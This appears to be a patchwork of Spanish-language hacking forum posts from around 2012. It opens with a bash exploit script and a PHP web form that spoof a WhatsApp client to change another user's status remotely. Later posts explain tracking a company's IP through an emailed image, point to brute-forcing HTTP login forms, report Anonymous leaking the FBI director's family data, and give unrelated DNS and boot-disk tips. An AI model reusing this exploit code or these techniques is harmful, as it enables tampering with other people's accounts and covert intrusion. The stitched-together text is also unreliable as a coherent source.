#!/bin/bash
#
# WhatsApp Status changer v0.2 stable
# A slim exploit able to change the WhatsApp
# user status in a remote way.
#
# This program is released under the terms of the GNU General Public License
# (GPL), which is distributed with this software in the file "COPYING".
# The GPL specifies the terms under which users may copy and use this software.
#
 
show_help(){
  echo ""
  echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit"
  echo ""
  echo " --usage    show the exploit Usage"
  echo " --credits  show the exploit Credits"
  echo " --help     show the Help"
  echo ""
  echo " enJoy"
}
 
show_credits(){
  echo ""
  echo " Emanuele Gentili"
  echo " http://www.emanuelegentili.eu"
  echo " eg @ offensive-security.it"
  echo ""
  echo " Stefano Fratepietro"
  echo " http://steve.deftlinux.net"
  echo " stefano @ deftlinux.net"
  echo ""
 
}
 
show_usage(){
  echo ""
  echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit"
  echo ""
  echo " usage $0 --countrycode 39 --mobilenum 3931212343 --text g0t p0wned"
  echo ""
  echo " enJoy"
}
 
 
# Bash
while [[ $# != 0 ]]; do
    arg_name=$1; shift
    case "$arg_name" in
      --help|-?|-h) show_help; exit 0;;
      --credits) show_credits; exit 0;;
      --usage) show_usage; exit 0;;
      --countrycode) countrycode=$1; shift;;
      --mobilenum) mobilenum=$2; shift;;
      --text) text=$3; shift;;
      *) echo "invalid option: $1"; show_help;exit 1;;
    esac
done
 
[ -z "$countrycode" ] && { show_help; exit 1; }
 
whatsAppagent="WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/Unknown_(iPhone4,1)"
 
wget --no-cache --delete-after --quiet --no-check-certificate --user-agent="$whatsAppagent" --post-data="cc=$countrycode&me=$mobilenum&s=$text" https://s.whatsapp.net/client/iphone/u.php
 
echo ""
echo "[+] Operazione completata."
echo ""

http://www.exploit-db.com/exploits/18396/

PHP

<form method="post">
 
    <dl>
        <dt>Country code: (example: 31)</dt>
        <dd><input type="text" name="cc" value="31" /></dd>
        <dt>Phonenumber: (example: +31612345678)</dt>
        <dd><input type="text" name="n" value="+316" /></dd>
        <dt>New status:</dt>
        <dd><input type="text" name="m" /></dd>
        <dd><input type="submit" value="Change!" /></dd>
    </dl>
 
</form>
 
<?php
ini_set('display_errors',0);
error_reporting(E_ALL|E_STRICT);
 
if ( $_SERVER['REQUEST_METHOD'] === 'POST' ) 
{
    $url = 'https://s.whatsapp.net/client/iphone/u.php';
    $fields = array(
        'cc' => urlencode($_POST['cc']),
        'me' => urlencode($_POST['n']),
        's'  => urlencode(stripslashes(utf8_decode($_POST['m'])))
    );
 
    //url-ify the data for the POST
    foreach ($fields as $key=>$value) {
        $fields_string .= $key . '=' . $value . '&';
    }
    rtrim($fields_string, '&');
 
    //open connection
    $ch = curl_init();
 
    //set the url, number of POST vars, POST data
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, count($fields));
    curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string);
    curl_setopt($ch, CURLOPT_USERAGENT, "WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/Unknown_(iPhone4,1)");
 
    //execute post
    $result = curl_exec($ch);
 
    //close connection
    curl_close($ch);
 
}
?>

Ya no funciona:

WhatsApp implemented an IP check – so this doesn’t work as well as it used to. The check entails checking if the update-request is for a WhatsApp account currently signed in, and checks if it is coming from the same IP as the target client is using. This means above could should still work for target WhatsApp users behind the same NAT (for example).

http://whatsappfail.net/index.php?option=com_content&view=article&id=2&catid=9&Itemid=121

http://www.wiretrip.org/2012/01/12/how-whatsappstatus-net-works/

El contraataque de Anonymous y diversos hackers al cierre de Megaupload ayer por parte del FBI continúa este viernes.

Si ayer a última hora Anonymous tumbaba varias páginas web relacionadas con la ley SOPA y con el cierre del famoso servidor, este viernes han filtrado a través de Twitter y de diversas páginas web todos los supuestos datos personales del director del FBI, Robert S. Mueller, y su familia: su mujer, sus hijas, su yerno y otros miembros.

Los datos que han hecho públicos en la Red alcanzan casi todas las esferas personales de Mueller y su familia: decenas de direcciones de varias ciudades de Estados Unidos, códigos postales, teléfonos y correos electrónicos.



http://www.publico.es/culturas/417937/anonymous-filtra-los-supuestos-datos-personales-del-director-del-fbi-tras-el-cierre-de-megaupload

Uy, uy... 

Rapidshare podría ser el siguiente portal cerrado
http://foro.elhacker.net/noticias/rapidshare_podria_ser_el_siguiente_portal_cerrado-t351099.0.html

claro mira la sgae ahora usa protecciones xD

http://www.sgae.com.s3-website-eu-west-1.amazonaws.com/

envías un e-mail a la empresa con una imagen que apunte a tu servidor, luego miras el log de acceso quién ha hecho get a esa imagen, y ya tienes la ip de esa empresa.

Claro la imagen que esté a parte para que no sea muy visitada, así sabrá seguro que esa es la ip. Es ingeniería social, o que visiten una web con un link, pero eso ya es más complicado  que hagan click.

Si usas dyndns.org es porque tienes una ip dinámica. Necesitas mejor una ip fija o estarás siempre con el mismo problema, cada vez que cambie de ip tienes que decirle la nueva ip.

Si tienes un dominio propio  puedes añadir una entrada CNAME a las DNS del subdomino micamarasweb.com para que apunte a miscamaras.dydns.org

Parece que la opción más fácil es usar el programa:

YUMI (Your Universal Multiboot Installer) El sucesor del MultibootIsos





Más info
http://www.pendrivelinux.com/yumi-multiboot-usb-creator/

Crear discos de arranque personalizados para tus proyectos
http://foro.elhacker.net/software/crear_discos_de_arranque_personalizados_para_tus_proyectos-t326662.0.html

Crear CD/DVD booteable...
http://foro.elhacker.net/software/crear_cddvd_booteable-t168517.0.html

creo que  es http-post-form


Le tienes que indicar el nombre de los campos del formuario (user y pass)

http://www.sillychicken.co.nz/2011/05/how-to-brute-force-http-forms-in-windows/

Es lo normal en muchos trabajos, un filtro, proxy que restringe las webs a visitar y además monitoriza todo el tráfico.

Navegar de forma segura y anónima mediante túneles SSH
http://foro.elhacker.net/seguridad/navegar_de_forma_segura_mediante_tuneles_ssh-t339204.0.html

|Demon|, warzone estuvo off-line un par de días, por culpa del disco duro, pero luego volvió a estar on-line, pero había otro problema con el directorio de las sesiones del php y aunque estaba activo no dejaba entrar, con lo que era como si estuviera off-line xDD